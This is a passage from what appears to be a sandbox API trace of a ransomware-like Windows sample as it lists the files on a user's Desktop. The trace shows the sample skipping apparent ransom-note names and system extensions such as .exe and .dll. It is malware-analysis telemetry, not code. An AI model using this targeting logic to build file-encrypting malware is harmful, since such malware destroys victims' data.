ftLastWriteTime.dwHighDateTime=0x1d5d866, nFileSizeHigh=0x0, nFileSizeLow=0x22de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Nv6hON99.gif", cAlternateFileName="")) returned 1 [0077.784] lstrcmpW (lpString1="Nv6hON99.gif", lpString2=".") returned 1 [0077.784] lstrcmpW (lpString1="Nv6hON99.gif", lpString2="..") returned 1 [0077.784] lstrcmpiW (lpString1="Nv6hON99.gif", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.784] lstrcmpiW (lpString1="Nv6hON99.gif", lpString2="Decryptor_Info.hta") returned 1 [0077.784] PathFindExtensionW (pszPath="Nv6hON99.gif") returned=".gif" [0077.784] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0077.784] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0077.784] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0077.784] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0077.896] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0077.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6edd48 [0077.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.896] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa686500, ftCreationTime.dwHighDateTime=0x1d5e0d4, ftLastAccessTime.dwLowDateTime=0x4d2a44f0, ftLastAccessTime.dwHighDateTime=0x1d5decf, ftLastWriteTime.dwLowDateTime=0x4d2a44f0, ftLastWriteTime.dwHighDateTime=0x1d5decf, nFileSizeHigh=0x0, nFileSizeLow=0x17515, dwReserved0=0x0, dwReserved1=0x0, cFileName="OiPhiPq EQyGt8pCeAoV.csv", cAlternateFileName="OIPHIP~1.CSV")) returned 1 [0077.896] lstrcmpW (lpString1="OiPhiPq EQyGt8pCeAoV.csv", lpString2=".") returned 1 [0077.896] lstrcmpW (lpString1="OiPhiPq EQyGt8pCeAoV.csv", lpString2="..") returned 1 [0077.896] lstrcmpiW (lpString1="OiPhiPq EQyGt8pCeAoV.csv", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.896] lstrcmpiW (lpString1="OiPhiPq EQyGt8pCeAoV.csv", lpString2="Decryptor_Info.hta") returned 1 [0077.896] PathFindExtensionW (pszPath="OiPhiPq EQyGt8pCeAoV.csv") returned=".csv" [0077.897] lstrcmpiW (lpString1=".csv", lpString2=".exe") returned -1 [0077.897] lstrcmpiW (lpString1=".csv", lpString2=".sys") returned -1 [0077.897] lstrcmpiW (lpString1=".csv", lpString2=".lnk") returned -1 [0077.897] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0077.897] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0077.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb648 [0077.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.897] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63716fd0, ftCreationTime.dwHighDateTime=0x1d5dfde, ftLastAccessTime.dwLowDateTime=0xc7ee9c60, ftLastAccessTime.dwHighDateTime=0x1d5da9a, ftLastWriteTime.dwLowDateTime=0xc7ee9c60, ftLastWriteTime.dwHighDateTime=0x1d5da9a, nFileSizeHigh=0x0, nFileSizeLow=0xd91c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q4jLxFd3p.pptx", cAlternateFileName="Q4JLXF~1.PPT")) returned 1 [0077.897] lstrcmpW (lpString1="Q4jLxFd3p.pptx", lpString2=".") returned 1 [0077.897] lstrcmpW (lpString1="Q4jLxFd3p.pptx", lpString2="..") returned 1 [0077.897] lstrcmpiW (lpString1="Q4jLxFd3p.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.897] lstrcmpiW (lpString1="Q4jLxFd3p.pptx", lpString2="Decryptor_Info.hta") returned 1 [0077.897] PathFindExtensionW (pszPath="Q4jLxFd3p.pptx") returned=".pptx" [0077.897] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0077.897] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0077.897] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0077.897] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0077.897] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0077.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fa998 [0077.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.897] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0aa33a0, ftCreationTime.dwHighDateTime=0x1d5e1a5, ftLastAccessTime.dwLowDateTime=0xfd8ab9d0, ftLastAccessTime.dwHighDateTime=0x1d5e7e2, ftLastWriteTime.dwLowDateTime=0xfd8ab9d0, ftLastWriteTime.dwHighDateTime=0x1d5e7e2, nFileSizeHigh=0x0, nFileSizeLow=0x155e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="SXVymLvqnxgquigP57Pv.xlsx", cAlternateFileName="SXVYML~1.XLS")) returned 1 [0077.898] lstrcmpW (lpString1="SXVymLvqnxgquigP57Pv.xlsx", lpString2=".") returned 1 [0077.898] lstrcmpW (lpString1="SXVymLvqnxgquigP57Pv.xlsx", lpString2="..") returned 1 [0077.898] lstrcmpiW (lpString1="SXVymLvqnxgquigP57Pv.xlsx", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.898] lstrcmpiW (lpString1="SXVymLvqnxgquigP57Pv.xlsx", lpString2="Decryptor_Info.hta") returned 1 [0077.898] PathFindExtensionW (pszPath="SXVymLvqnxgquigP57Pv.xlsx") returned=".xlsx" [0077.898] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0077.898] lstrcmpiW (lpString1=".xlsx", lpString2=".sys") returned 1 [0077.898] lstrcmpiW (lpString1=".xlsx", lpString2=".lnk") returned 1 [0077.898] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0077.898] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0077.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb6d0 [0077.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.898] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb57a1610, ftCreationTime.dwHighDateTime=0x1d5ddf9, ftLastAccessTime.dwLowDateTime=0xcd5a5b70, ftLastAccessTime.dwHighDateTime=0x1d5dabe, ftLastWriteTime.dwLowDateTime=0xcd5a5b70, ftLastWriteTime.dwHighDateTime=0x1d5dabe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tjRtep--W8 SqtmSnaj", cAlternateFileName="TJRTEP~1")) returned 1 [0077.898] lstrcmpW (lpString1="tjRtep--W8 SqtmSnaj", lpString2=".") returned 1 [0077.898] lstrcmpW (lpString1="tjRtep--W8 SqtmSnaj", lpString2="..") returned 1 [0077.898] lstrlenW (lpString="tjRtep--W8 SqtmSnaj") returned 19 [0077.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="tjRtep--W8 SqtmSnaj" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj" [0077.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\" [0077.898] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\") returned 58 [0077.898] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\*", fInfoLevelId=0x0, lpFindFileData=0x28e128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e128) returned 0x70d700 [0077.899] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.899] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb57a1610, ftCreationTime.dwHighDateTime=0x1d5ddf9, ftLastAccessTime.dwLowDateTime=0xcd5a5b70, ftLastAccessTime.dwHighDateTime=0x1d5dabe, ftLastWriteTime.dwLowDateTime=0xcd5a5b70, ftLastWriteTime.dwHighDateTime=0x1d5dabe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.899] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.899] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.899] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1d61c10, ftCreationTime.dwHighDateTime=0x1d5d985, ftLastAccessTime.dwLowDateTime=0xce22a0f0, ftLastAccessTime.dwHighDateTime=0x1d5d8af, ftLastWriteTime.dwLowDateTime=0xce22a0f0, ftLastWriteTime.dwHighDateTime=0x1d5d8af, nFileSizeHigh=0x0, nFileSizeLow=0x3259, dwReserved0=0x0, dwReserved1=0x0, cFileName="GfH 1Ie6wOQzY 5k4DI.png", cAlternateFileName="GFH1IE~1.PNG")) returned 1 [0077.899] lstrcmpW (lpString1="GfH 1Ie6wOQzY 5k4DI.png", lpString2=".") returned 1 [0077.899] lstrcmpW (lpString1="GfH 1Ie6wOQzY 5k4DI.png", lpString2="..") returned 1 [0077.899] lstrcmpiW (lpString1="GfH 1Ie6wOQzY 5k4DI.png", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.899] lstrcmpiW (lpString1="GfH 1Ie6wOQzY 5k4DI.png", lpString2="Decryptor_Info.hta") returned 1 [0077.899] PathFindExtensionW (pszPath="GfH 1Ie6wOQzY 5k4DI.png") returned=".png" [0077.899] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0077.899] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0077.899] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0077.899] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0077.899] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0077.899] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.899] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0077.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e95c0 [0077.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.900] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88773820, ftCreationTime.dwHighDateTime=0x1d5e0b3, ftLastAccessTime.dwLowDateTime=0x1d2864d0, ftLastAccessTime.dwHighDateTime=0x1d5dc18, ftLastWriteTime.dwLowDateTime=0x1d2864d0, ftLastWriteTime.dwHighDateTime=0x1d5dc18, nFileSizeHigh=0x0, nFileSizeLow=0x126e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="q5Hr7lyiRfCApU6C.xls", cAlternateFileName="Q5HR7L~1.XLS")) returned 1 [0077.900] lstrcmpW (lpString1="q5Hr7lyiRfCApU6C.xls", lpString2=".") returned 1 [0077.900] lstrcmpW (lpString1="q5Hr7lyiRfCApU6C.xls", lpString2="..") returned 1 [0077.900] lstrcmpiW (lpString1="q5Hr7lyiRfCApU6C.xls", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.900] lstrcmpiW (lpString1="q5Hr7lyiRfCApU6C.xls", lpString2="Decryptor_Info.hta") returned 1 [0077.900] PathFindExtensionW (pszPath="q5Hr7lyiRfCApU6C.xls") returned=".xls" [0077.900] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0077.900] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0077.900] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0077.900] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0077.900] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0077.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0077.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x6f3798 [0077.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.900] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f66b90, ftCreationTime.dwHighDateTime=0x1d5dd86, ftLastAccessTime.dwLowDateTime=0x964afb40, ftLastAccessTime.dwHighDateTime=0x1d5dfc7, ftLastWriteTime.dwLowDateTime=0x964afb40, ftLastWriteTime.dwHighDateTime=0x1d5dfc7, nFileSizeHigh=0x0, nFileSizeLow=0x129e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="X2JajLRX6.bmp", cAlternateFileName="X2JAJL~1.BMP")) returned 1 [0077.900] lstrcmpW (lpString1="X2JajLRX6.bmp", lpString2=".") returned 1 [0077.900] lstrcmpW (lpString1="X2JajLRX6.bmp", lpString2="..") returned 1 [0077.900] lstrcmpiW (lpString1="X2JajLRX6.bmp", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.900] lstrcmpiW (lpString1="X2JajLRX6.bmp", lpString2="Decryptor_Info.hta") returned 1 [0077.900] PathFindExtensionW (pszPath="X2JajLRX6.bmp") returned=".bmp" [0077.900] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0077.900] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0077.901] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0077.901] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0077.901] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0077.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0077.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f3840 [0077.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.901] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2340f2e0, ftCreationTime.dwHighDateTime=0x1d5d850, ftLastAccessTime.dwLowDateTime=0x73176be0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0x73176be0, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x1076b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y3db1aC_5AlNpQZ4cPG.avi", cAlternateFileName="Y3DB1A~1.AVI")) returned 1 [0077.901] lstrcmpW (lpString1="Y3db1aC_5AlNpQZ4cPG.avi", lpString2=".") returned 1 [0077.901] lstrcmpW (lpString1="Y3db1aC_5AlNpQZ4cPG.avi", lpString2="..") returned 1 [0077.901] lstrcmpiW (lpString1="Y3db1aC_5AlNpQZ4cPG.avi", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.901] lstrcmpiW (lpString1="Y3db1aC_5AlNpQZ4cPG.avi", lpString2="Decryptor_Info.hta") returned 1 [0077.901] PathFindExtensionW (pszPath="Y3db1aC_5AlNpQZ4cPG.avi") returned=".avi" [0077.901] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0077.901] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0077.901] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0077.901] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0077.901] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0077.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0077.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9678 [0077.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.901] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5693ef0, ftCreationTime.dwHighDateTime=0x1d5da9e, ftLastAccessTime.dwLowDateTime=0xb265b090, ftLastAccessTime.dwHighDateTime=0x1d5dfae, ftLastWriteTime.dwLowDateTime=0xb265b090, ftLastWriteTime.dwHighDateTime=0x1d5dfae, nFileSizeHigh=0x0, nFileSizeLow=0x4cc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZdpWNdpdNx.mp4", cAlternateFileName="ZDPWND~1.MP4")) returned 1 [0077.901] lstrcmpW (lpString1="ZdpWNdpdNx.mp4", lpString2=".") returned 1 [0077.901] lstrcmpW (lpString1="ZdpWNdpdNx.mp4", lpString2="..") returned 1 [0077.902] lstrcmpiW (lpString1="ZdpWNdpdNx.mp4", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.902] lstrcmpiW (lpString1="ZdpWNdpdNx.mp4", lpString2="Decryptor_Info.hta") returned 1 [0077.902] PathFindExtensionW (pszPath="ZdpWNdpdNx.mp4") returned=".mp4" [0077.902] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0077.902] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0077.902] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0077.902] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0077.902] lstrcmpiW (lpString1=".mp4", lpString2=".msi") returned -1 [0077.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0077.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x6f77f8 [0077.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.902] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5693ef0, ftCreationTime.dwHighDateTime=0x1d5da9e, ftLastAccessTime.dwLowDateTime=0xb265b090, ftLastAccessTime.dwHighDateTime=0x1d5dfae, ftLastWriteTime.dwLowDateTime=0xb265b090, ftLastWriteTime.dwHighDateTime=0x1d5dfae, nFileSizeHigh=0x0, nFileSizeLow=0x4cc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZdpWNdpdNx.mp4", cAlternateFileName="ZDPWND~1.MP4")) returned 0 [0077.902] FindClose (in: hFindFile=0x70d700 | out: hFindFile=0x70d700) returned 1 [0077.902] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b314970, ftCreationTime.dwHighDateTime=0x1d5e362, ftLastAccessTime.dwLowDateTime=0x85677d0, ftLastAccessTime.dwHighDateTime=0x1d5dfca, ftLastWriteTime.dwLowDateTime=0x85677d0, ftLastWriteTime.dwHighDateTime=0x1d5dfca, nFileSizeHigh=0x0, nFileSizeLow=0x18103, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtegBM.png", cAlternateFileName="")) returned 1 [0077.902] lstrcmpW (lpString1="TtegBM.png", lpString2=".") returned 1 [0077.902] lstrcmpW (lpString1="TtegBM.png", lpString2="..") returned 1 [0077.902] lstrcmpiW (lpString1="TtegBM.png", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.902] lstrcmpiW (lpString1="TtegBM.png", lpString2="Decryptor_Info.hta") returned 1 [0077.902] PathFindExtensionW (pszPath="TtegBM.png") returned=".png" [0077.902] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0077.903] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0077.903] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0077.903] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0077.903] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0077.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6faa10 [0077.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.903] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaafcdb10, ftCreationTime.dwHighDateTime=0x1d5da7e, ftLastAccessTime.dwLowDateTime=0x95085880, ftLastAccessTime.dwHighDateTime=0x1d5e81f, ftLastWriteTime.dwLowDateTime=0x95085880, ftLastWriteTime.dwHighDateTime=0x1d5e81f, nFileSizeHigh=0x0, nFileSizeLow=0x16f96, dwReserved0=0x0, dwReserved1=0x0, cFileName="v77US0E_TICx8-AF-.gif", cAlternateFileName="V77US0~1.GIF")) returned 1 [0077.903] lstrcmpW (lpString1="v77US0E_TICx8-AF-.gif", lpString2=".") returned 1 [0077.903] lstrcmpW (lpString1="v77US0E_TICx8-AF-.gif", lpString2="..") returned 1 [0077.903] lstrcmpiW (lpString1="v77US0E_TICx8-AF-.gif", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.903] lstrcmpiW (lpString1="v77US0E_TICx8-AF-.gif", lpString2="Decryptor_Info.hta") returned 1 [0077.903] PathFindExtensionW (pszPath="v77US0E_TICx8-AF-.gif") returned=".gif" [0077.903] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0077.903] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0077.903] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0077.903] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0077.903] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0077.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb758 [0077.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.904] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65254050, ftCreationTime.dwHighDateTime=0x1d5df9c, ftLastAccessTime.dwLowDateTime=0xb1028fc0, ftLastAccessTime.dwHighDateTime=0x1d5e4e0, ftLastWriteTime.dwLowDateTime=0xb1028fc0, ftLastWriteTime.dwHighDateTime=0x1d5e4e0, nFileSizeHigh=0x0, nFileSizeLow=0x2cd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="w7Dlby_SMcv7Lq87Z3YF.flv", cAlternateFileName="W7DLBY~1.FLV")) returned 1 [0077.904] lstrcmpW (lpString1="w7Dlby_SMcv7Lq87Z3YF.flv", lpString2=".") returned 1 [0077.904] lstrcmpW (lpString1="w7Dlby_SMcv7Lq87Z3YF.flv", lpString2="..") returned 1 [0077.904] lstrcmpiW (lpString1="w7Dlby_SMcv7Lq87Z3YF.flv", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.904] lstrcmpiW (lpString1="w7Dlby_SMcv7Lq87Z3YF.flv", lpString2="Decryptor_Info.hta") returned 1 [0077.904] PathFindExtensionW (pszPath="w7Dlby_SMcv7Lq87Z3YF.flv") returned=".flv" [0077.904] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0077.904] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0077.904] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0077.904] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0077.904] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0077.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb7e0 [0077.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.904] FindNextFileW (in: 